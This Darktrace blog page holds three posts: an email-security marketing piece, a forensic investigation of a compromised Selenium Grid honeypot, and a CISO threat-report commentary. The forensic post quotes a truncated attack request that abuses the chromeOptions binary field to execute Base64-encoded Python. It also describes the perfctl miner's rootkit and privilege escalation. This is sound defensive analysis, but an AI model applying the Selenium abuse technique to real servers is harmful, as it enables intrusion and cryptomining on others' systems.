Blog
/
Email
/
April 10, 2023

Employee-Conscious Email Security Solutions in the Workforce

Email threats commonly affect organizations. Read Darktrace's expert insights on how to safeguard your business by educating employees about email security.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Written by
Carlos Gray
Senior Product Marketing Manager, Email
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
10
Apr 2023

When considering email security, IT teams have historically had to choose between excluding employees entirely, or including them but giving them too much power and implementing unenforceable, trust-based policies that try to make up for it. 

However, just because email security should not rely on employees, this does not mean they should be excluded entirely. Employees are the ones interacting with emails daily, and their experiences and behaviors can provide valuable security insights and even influence productivity. 

AI technology supports employee engagement in this non-intrusive, nuanced way to not only maintain email security, but also enhance it. 

Finding a Balance of Employee Involvement in Security Strategies

Historically, security solutions offered ‘all or nothing’ approaches to employee engagement. On one hand, when employees are involved, they are unreliable. Employees cannot all be experts in security on top of their actual job responsibilities, and mistakes are bound to happen in fast-paced environments.  

Although there have been attempts to raise security awareness, they often have shortcomings, as training emails lack context and realism, leaving employees with poor understandings that often lead to reporting emails that are actually safe. Having users constantly triaging their inboxes and reporting safe emails wastes time that takes away from their own productivity as well as the productivity of the security team.

Other historic forms of employee involvement also put security at risk. For example, users could create blanket rules through feedback, which could lead to common problems like safe-listing every email that comes from the gmail.com domain. Other times, employees could choose for themselves to release emails without context or limitations, introducing major risks to the organization. While these types of actions include employees to participate in security, they do so at the cost of security. 

Even lower stakes employee involvement can prove ineffective. For example, excessive warnings when sending emails to external contacts can lead to banner fatigue. When employees see the same warning message or alert at the top of every message, it’s human nature that they soon become accustomed and ultimately immune to it.

On the other hand, when employees are fully excluded from security, an opportunity is missed to fine-tune security according to the actual users and to gain feedback on how well the email security solution is working. 

So, both options of historically conventional email security, to include or exclude employees, prove incapable of leveraging employees effectively. The best email security practice strikes a balance between these two extremes, allowing more nuanced interactions that maintain security without interrupting daily business operations. This can be achieved with AI that tailors the interactions specifically to each employee to add to security instead of detracting from it. 

Reducing False Reports While Improving Security Awareness Training 

Humans and AI-powered email security can simultaneously level up by working together. AI can inform employees and employees can inform AI in an employee-AI feedback loop.  

By understanding ‘normal’ behavior for every email user, AI can identify unusual, risky components of an email and take precise action based on the nature of the email to neutralize them, such as rewriting links, flattening attachments, and moving emails to junk. AI can go one step further and explain in non-technical language why it has taken a specific action, which educates users. In contrast to point-in-time simulated phishing email campaigns, this means AI can share its analysis in context and in real time at the moment a user is questioning an email. 

The employee-AI feedback loop educates employees so that they can serve as additional enrichment data. It determines the appropriate levels to inform and teach users, while not relying on them for threat detection

In the other direction, the AI learns from users’ activity in the inbox and gradually factors this into its decision-making. This is not a ‘one size fits all’ mechanism – one employee marking an email as safe will never result in blanket approval across the business – but over time, patterns can be observed and autonomous decision-making enhanced.  

Figure 1: The employee-AI feedback loop increases employee understanding without putting security at risk.

The employee-AI feedback loop draws out the maximum potential benefits of employee involvement in email security. Other email security solutions only consider the security team, enhancing its workflow but never considering the employees that report suspicious emails. Employees who try to do the right thing but blindly report emails never learn or improve and end up wasting their own time. By considering employees and improving security awareness training, the employee-AI feedback loop can level up users. They learn from the AI explanations how to identify malicious components, and so then report fewer emails but with greater accuracy. 

While AI programs have classically acted like black boxes, Darktrace trains its AI on the best data, the organization’s actual employees, and invites both the security team and employees to see the reasoning behind its conclusions. Over time, employees will trust themselves more as they better learn how to discern unsafe emails. 

Leveraging AI to Generate Productivity Gains

Uniquely, AI-powered email security can have effects outside of security-related areas. It can save time by managing non-productive email. As the AI constantly learns employee behavior in the inbox, it becomes extremely effective at detecting spam and graymail – emails that aren't necessarily malicious, but clutter inboxes and hamper productivity. It does this on a per-user basis, specific to how each employee treats spam, graymail, and newsletters. The AI learns to detect this clutter and eventually learns which to pull from the inbox, saving time for the employees. This highlights how security solutions can go even further than merely protecting the email environment with a light touch, to the point where AI can promote productivity gains by automating tasks like inbox sorting.

Preventing Email Mishaps: How to Deal with Human Error

Improved user understanding and decision making cannot stop natural human error. Employees are bound to make mistakes and can easily send emails to the wrong people, especially when Outlook auto-fills the wrong recipient. This can have effects ranging anywhere from embarrassing to critical, with major implications on compliance, customer trust, confidential intellectual property, and data loss. 

However, AI can help reduce instances of accidentally sending emails to the wrong people. When a user goes to send an email in Outlook, the AI will analyze the recipients. It considers the contextual relationship between the sender and recipients, the relationships the recipients have with each other, how similar each recipient’s name and history is to other known contacts, and the names of attached files.  

If the AI determines that the email is outside of a user’s typical behavior, it may alert the user. Security teams can customize what the AI does next: it can block the email, block the email but allow the user to override it, or do nothing but invite the user to think twice. Since the AI analyzes each email, these alerts are more effective than consistent, blanket alerts warning about external recipients, which often go ignored. With this targeted approach, the AI prevents data leakage and reduces cyber risk. 

Since the AI is always on and continuously learning, it can adapt autonomously to employee changes. If the role of an employee evolves, the AI will learn the new normal, including common behaviors, recipients, attached file names, and more. This allows the AI to continue effectively flagging potential instances of human error, without needing manual rule changes or disrupting the employee’s workflow. 

Email Security Informed by Employee Experience

As the practical users of email, employees should be considered when designing email security. This employee-conscious lens to security can strengthen defenses, improve productivity, and prevent data loss.  

In these ways, email security can benefit both employees and security teams. Employees can become another layer of defense with improved security awareness training that cuts down on false reports of safe emails. This insight into employee email behavior can also enhance employee productivity by learning and sorting graymail. Finally, viewing security in relation to employees can help security teams deploy tools that reduce data loss by flagging misdirected emails. With these capabilities, Darktrace/Email™ enables security teams to optimize the balance of employee involvement in email security.

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Written by
Carlos Gray
Senior Product Marketing Manager, Email

Blog

/

Cloud

/

March 5, 2026

Inside Cloud Compromise: Investigating Attacker Activity with Darktrace / Forensic Acquisition & Investigation

Forensic Acquisition and investigationDefault blog imageDefault blog image

Investigating cloud attacks with Darktrace/ Forensic Acquisition & Investigation

Darktrace / Forensic Acquisition & Investigation™ is the industry’s first truly automated forensic solution purpose-built for the cloud. This blog will demonstrate how an investigation can be carried out against a compromised cloud server in minutes, rather than hours or days.

The compromised server investigated in this case originates from Darktrace’s Cloudypots system, a global honeypot network designed to observe adversary activity in real time across a wide range of cloud services. Whenever an attacker successfully compromises one of these honeypots, a forensic copy of the virtual server's disk is preserved for later analysis. Using Forensic Acquisition & Investigation, analysts can then investigate further and obtain detailed insights into the compromise including complete attacker timelines and root cause analysis.

Forensic Acquisition & Investigation supports importing artifacts from a variety of sources, including EC2 instances, ECS, S3 buckets, and more. The Cloudypots system produces a raw disk image whenever an attack is detected and stores it in an S3 bucket. This allows the image to be directly imported into Forensic Acquisition & Investigation using the S3 bucket import option.

As Forensic Acquisition & Investigation runs cloud-natively, no additional configuration is required to add a specific S3 bucket. Analysts can browse and acquire forensic assets from any bucket that the configured IAM role is permitted to access. Operators can also add additional IAM credentials, including those from other cloud providers, to extend access across multiple cloud accounts and environments.

Figure 1: Forensic Acquisition & Investigation import screen.

Forensic Acquisition & Investigation then retrieves a copy of the file and automatically begins running the analysis pipeline on the artifact. This pipeline performs a full forensic analysis of the disk and builds a timeline of the activity that took place on the compromised asset. By leveraging Forensic Acquisition & Investigation’s cloud-native analysis system, this process condenses hour of manual work into just minutes.

Successful import of a forensic artifact and initiation of the analysis pipeline.
Figure 2: Successful import of a forensic artifact and initiation of the analysis pipeline.

Once processing is complete, the preserved artifact is visible in the Evidence tab, along with a summary of key information obtained during analysis, such as the compromised asset’s hostname, operating system, cloud provider, and key event count.

The Evidence overview showing the acquired disk image.
Figure 3: The Evidence overview showing the acquired disk image.

Clicking on the “Key events” field in the listing opens the timeline view, automatically filtered to show system- generated alarms.

The timeline provides a chronological record of every event that occurred on the system, derived from multiple sources, including:

  • Parsed log files such as the systemd journal, audit logs, application specific logs, and others.
  • Parsed history files such as .bash_history, allowing executed commands to be shown on the timeline.
  • File-specific events, such as files being created, accessed, modified, or executables being run, etc.

This approach allows timestamped information and events from multiple sources to be aggregated and parsed into a single, concise view, greatly simplifying the data review process.

Alarms are created for specific timeline events that match either a built-in system rule, curated by Darktrace’s Threat Research team or an operator-defined created at the project level. These alarms help quickly filter out noise and highlight on events of interest, such as the creation of a file containing known malware, access to sensitive files like Amazon Web Service (AWS) credentials, suspicious arguments or commands, and more.

 The timeline view filtered to alarm_severity: “1” OR alarm_severity: “3”, showing only events that matched an alarm rule.
Figure 4: The timeline view filtered to alarm_severity: “1” OR alarm_severity: “3”, showing only events that matched an alarm rule.

In this case, several alarms were generated for suspicious Base64 arguments being passed to Selenium. Examining the event data, it appears the attacker spawned a Selenium Grid session with the following payload:

"request.payload": "[Capabilities {browserName: chrome, goog:chromeOptions: {args: [-cimport base64;exec(base64...], binary: /usr/bin/python3, extensions: []}, pageLoadStrategy: normal}]"

This is a common attack vector for Selenium Grid. The chromeOptions object is intended to specify arguments for how Google Chrome should be launched; however, in this case the attacker has abused the binary field to execute the Python3 binary instead of Chrome. Combined with the option to specify command-line arguments, the attacker can use Python3’s -c option to execute arbitrary Python code, in this instance, decoding and executing a Base64 payload.

Selenium’s logs truncate the Arguments field automatically, so an alternate method is required to retrieve the full payload. To do this, the search bar can be used to find all events that occurred around the same time as this flagged event.

Pivoting off the previous event by filtering the timeline to events within the same window using timestamp: [“2026-02-18T09:09:00Z” TO “2026-02-18T09:12:00Z”].
Figure 5: Pivoting off the previous event by filtering the timeline to events within the same window using timestamp: [“2026-02-18T09:09:00Z” TO “2026-02-18T09:12:00Z”].

Scrolling through the search results, an entry from Java’s systemd journal can be identified. This log contains the full, unaltered payload. GCHQ’s CyberChef can then be used to decode the Base64 data into the attacker’s script, which will ultimately be executed.[NJ9]

Decoding the attacker’s payload in CyberChef.
Figure 6: Decoding the attacker’s payload in CyberChef.

In this instance, the malware was identified as a variant of a campaign that has been previously documented in depth by Darktrace.

Investigating Perfectl Malware

This campaign deploys a malware sample known as ‘perfctl to the compromised host. The script executed by the attacker downloads a Go binary named “promocioni.php” from 200[.]4.115.1. Its functionality is consistent with previously documented perfctl samples, with only minor changes such as updated filenames and a new command-and-control (C2) domain.

Perctl is a stealthy malware that has several systems designed  to evade detection. The main binary is packed with UPX, with the header intentionally tampered with to prevent unpacking using regular tools. The binary also avoids executing any malicious code if it detects debugging or tracing activity, or if artifacts left by earlier stages are missing.

To further aid its evasive capabilities, perfctl features a usermode rootkit using an LD preload. This causes dynamically linked executables to load perfctl’s rootkit payload before other system modules, allowing it to override functions, such as intercepting calls to list files and hiding output from the returned list. Perctl uses this to hide its own files, as well as other files like the ld.so.preload file, preventing users from identifying that a rootkit is present in the first place.

This also makes it difficult to dynamically analyze, as even analysts aware of the rootkit will struggle to get around it due to its aggressiveness in hiding its components. A useful trick is to use the busybox-static utilities, which are statically linked and therefore immune to LD preloading.

Perctl will attempt to use sudo to escalate its permissions to root if the user it was executed as has the required privileges. Failing this, it will attempt to exploit the vulnerability CVE-2021-4034.

Ultimately, perfctl will attempt to establish a C2 link via Tor and spawn an XMRig miner to mine the Monero cryptocurrency. The traffic to the mining pool is encapsulated within Tor to limit network detection of the mining traffic.

Darktrace’s Cloudypots system has observed 1,959 infections of the perfectl campaign across its honeypot network in the past year, making it one of the most aggressive campaigns seen by Darktrace.

Key takeaways

This blog has shown how Darktrace / Forensic Acquisition & Investigation equips defenders in the face of a real-world attacker campaign. By using this solution, organizations can acquire forensic evidence and investigate intrusions across multiple cloud resources and providers, enabling defenders to see the full picture of an intrusion on day one. Forensic Acquisition & Investigation’s patented data-processing system takes advantage of the cloud’s scale to rapidly process large amounts of data, allowing triage to take minutes, not hours.

Darktrace / Forensic Acquisition & Investigation is available as Software-as-a-Service (SaaS) but can also be deployed on-premises as a virtual application or natively in the cloud, providing flexibility between convenience and data sovereignty to suit any use case.

Support for acquiring traditional compute instances like EC2, as well as more exotic and newly targeted platforms such as ECS and Lambda, ensures that attacks taking advantage of Living-off-the-Cloud (LOTC) strategies can be triaged quickly and easily as part of incident response. As attackers continue to develop new techniques, the ability to investigate how they use cloud services to persist and pivot throughout an environment is just as important to triage as a single compromised EC2 instance.

Credit to Nathaniel Bill (Malware Research Engineer)

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

AI

/

March 2, 2026

What the Darktrace Annual Threat Report 2026 Means for Security Leaders

Image of the Earth from spaceDefault blog imageDefault blog image

The challenge for today’s CISOs

At the broadest level, the defining characteristic of cybersecurity in 2026 is the sheer pace of change shaping the environments we protect. Organizations are operating in ecosystems that are larger, more interconnected, and more automated than ever before – spanning cloud platforms, distributed identities, AI-driven systems, and continuous digital workflows.  

The velocity of this expansion has outstripped the slower, predictable patterns security teams once relied on. What used to be a stable backdrop is now a living, shifting landscape where technology, risk, and business operations evolve simultaneously. From this vantage point, the central challenge for security leaders isn’t reacting to individual threats, but maintaining strategic control and clarity as the entire environment accelerates around them.

Strategic takeaways from the Annual Threat Report

The Darktrace Annual Threat Report 2026 reinforces a reality every CISO feels: the center of gravity isn’t the perimeter, vulnerability management, or malware, but trust abused via identity. For example, our analysis found that nearly 70% of incidents in the Americas region begin with stolen or misused accounts, reflecting the global shift toward identity‑led intrusions.

Mass adoption of AI agents, cloud-native applications, and machine decision-making means CISOs now oversee systems that act on their own. This creates an entirely new responsibility: ensuring those systems remain safe, predictable, and aligned to business intent, even under adversarial pressure.

Attackers increasingly exploit trust boundaries, not firewalls – leveraging cloud entitlements, SaaS identity transitions, supply-chain connectivity, and automation frameworks. The rise of non-human identities intensifies this: credentials, tokens, and agent permissions now form the backbone of operational risk.

Boards are now evaluating CISOs on business continuity, operational recovery, and whether AI systems and cloud workloads can fail safely without cascading or causing catastrophic impact.

In this environment, detection accuracy, autonomous response, and blast radius minimization matter far more than traditional control coverage or policy checklists.

Every organization will face setbacks; resilience is measured by how quickly security teams can rise, respond, and resume momentum. In 2026, success will belong to those that adapt fastest.

Managing business security in the age of AI

CISO accountability in 2026 has expanded far beyond controls and tooling. Whether we asked for it or not, we now own outcomes tied to business resilience, AI trust, cloud assurance, and continuous availability. The role is less about certainty and more about recovering control in an environment that keeps accelerating.

Every major 2026 initiative – AI agents, third-party risk, cloud, or comms protection – connects to a single board-level question: Are we still in control as complexity and automation scale faster than humans?

Attackers are not just getting more sophisticated; they are becoming more automated. AI changes the economics of attack, lowering cost and increasing speed. That asymmetry is what CISOs are being measured against.

CISOs are no longer evaluated on tool coverage, but on the ability to assure outcomes – trust in AI adoption, resilience across cloud and identity, and being able to respond to unknown and unforeseen threats.

Boards are now explicitly asking whether we can defend against AI-driven threats. No one can predict every new behavior – survival depends on detecting malicious deviations from normal fast and responding autonomously.  

Agents introduce decision-making at machine speed. Governance, CI/CD scanning, posture management, red teaming, and runtime detection are no longer differentiators but the baseline.

Cloud security is no longer architectural, it is operational. Identity, control planes, and SaaS exposure now sit firmly with the CISO.

AI-speed threats already reshaping security in 2026

We’re already seeing clear examples of how quickly the threat landscape has shifted in 2026. Darktrace’s work on React2Shell exposed just how unforgiving the new tempo is: a honeypot stood up with an exposed React was hit in under two minutes. There was no recon phase, no gradual probing – just immediate, automated exploitation the moment the code appeared publicly. Exposure now equals compromise unless defenses can detect, interpret, and act at machine speed. Traditional operational rhythms simply don’t map to this reality.

We’re also facing the first wave of AI-authored malware, where LLMs generate code that mutates on demand. This removes the historic friction from the attacker side: no skill barrier, no time cost, no limit on iteration. Malware families can regenerate themselves, shift structure, and evade static controls without a human operator behind the keyboard. This forces CISOs to treat adversarial automation as a core operational risk and ensure that autonomous systems inside the business remain predictable under pressure.

The CVE-2026-1731 BeyondTrust exploitation wave reinforced the same pattern. The gap between disclosure and active, global exploitation compressed into hours. Automated scanning, automated payload deployment, coordinated exploitation campaigns, all spinning up faster than most organizations can push an emergency patch through change control. The vulnerability-to-exploit window has effectively collapsed, making runtime visibility, anomaly detection, and autonomous containment far more consequential than patching speed alone.

These cases aren’t edge scenarios; they represent the emerging norm. Complexity and automation have outpaced human-scale processes, and attackers are weaponizing that asymmetry.  

The real differentiator for CISOs in 2026 is less about knowing everything and more about knowing immediately when something shifts – and having systems that can respond at the same speed.

[related-resource]

Continue reading
About the author
Mike Beck
Global CISO
Your data. Our AI.
Elevate your network security with Darktrace AI